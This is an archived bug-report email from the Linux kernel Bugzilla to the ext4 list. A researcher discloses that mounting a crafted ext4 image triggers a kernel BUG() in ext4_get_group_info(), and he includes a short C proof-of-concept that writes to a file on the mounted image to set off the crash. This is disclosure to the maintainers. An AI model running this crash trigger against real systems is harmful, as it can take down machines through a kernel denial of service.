[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <bug-200015-13602-v0sCYWAnQL@https.bugzilla.kernel.org/>
Date: Fri, 15 Jun 2018 00:15:51 +0000
From: bugzilla-daemon@...zilla.kernel.org
To: linux-ext4@...nel.org
Subject: [Bug 200015] BUG() triggered in ext4_get_group_info() when mounting
and operating a crafted ext4 image
https://bugzilla.kernel.org/show_bug.cgi?id=200015
--- Comment #4 from Wen Xu (wen.xu@...ech.edu) ---
Created attachment 276563
--> https://bugzilla.kernel.org/attachment.cgi?id=276563&action=edit
Simplified image
Hi Ted,
You can still use this POC:
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>
#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/falloc.h>
#include <linux/loop.h>
static void activity(char *mpoint) {
char *foo_bar_baz;
int err;
static int buf[8192];
memset(buf, 0, sizeof(buf));
err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint);
int fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
if (fd >= 0) {
write(fd, (char *)buf, 517);
write(fd, (char *)buf, sizeof(buf));
close(fd);
}
fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
if (fd >= 0) {
write(fd, (char *)buf, sizeof(buf));
close(fd);
}
}
int main(int argc, char *argv[]) {
activity(argv[1]);
return 0;
}
When I am testing, sometimes umount is required.
Thanks,
Wen
--
You are receiving this mail because:
You are watching the assignee of the bug.
Powered by blists - more mailing lists